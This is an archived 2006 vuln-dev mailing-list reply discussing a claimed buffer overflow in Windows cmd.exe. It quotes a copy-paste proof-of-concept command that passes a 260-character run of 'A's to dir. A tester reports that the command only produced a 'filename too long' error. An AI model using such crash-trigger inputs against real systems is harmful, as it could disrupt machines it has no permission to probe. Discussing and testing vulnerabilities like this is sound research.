RE: Windows Command Processor CMD.EXE Buffer Overflow
- From: "Luis Alberto Cortes Zavala" <napasn@xxxxxxxxxxxxxxxxxx>
- Date: Fri, 20 Oct 2006 14:33:00 -0500
YEah! Buffer Overflow Windows XP SP2
I Hill debug this.
Luís Alberto Cortes Zavala
IT / Security Consultant
napa@xxxxxxxxxxxxxxxxxx
http://www.securitynation.com
-----Mensaje original-----
De: listbounce@xxxxxxxxxxxxxxxxx [mailto:listbounce@xxxxxxxxxxxxxxxxx] En
nombre de The SNiFF
Enviado el: Viernes, 20 de Octubre de 2006 03:58 a.m.
Para: vuln-dev@xxxxxxxxxxxxxxxxx
Asunto: Re: Windows Command Processor CMD.EXE Buffer Overflow
Copy-paste the following line in cmd.exe and execute it..\\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(it is a single command, has been split into multiple lines for
readability sake).
%COMSPEC% /K "dir
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
(260 characters of 'A's)
Tried it on Win2k3 SP1:
C:\Documents and Settings\Administrator>%COMSPEC% /K
"dir\\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
System replied:
The filename or extension is too long.
- References:
- Re: Windows Command Processor CMD.EXE Buffer Overflow
- From: The SNiFF
- Re: Windows Command Processor CMD.EXE Buffer Overflow
- Prev by Date: RE: Windows Command Processor CMD.EXE Buffer Overflow
- Next by Date: Re: Windows Command Processor CMD.EXE Buffer Overflow
- Previous by thread: Re: Windows Command Processor CMD.EXE Buffer Overflow
- Next by thread: RE: Windows Command Processor CMD.EXE Buffer Overflow
- Index(es):
Relevant Pages
|
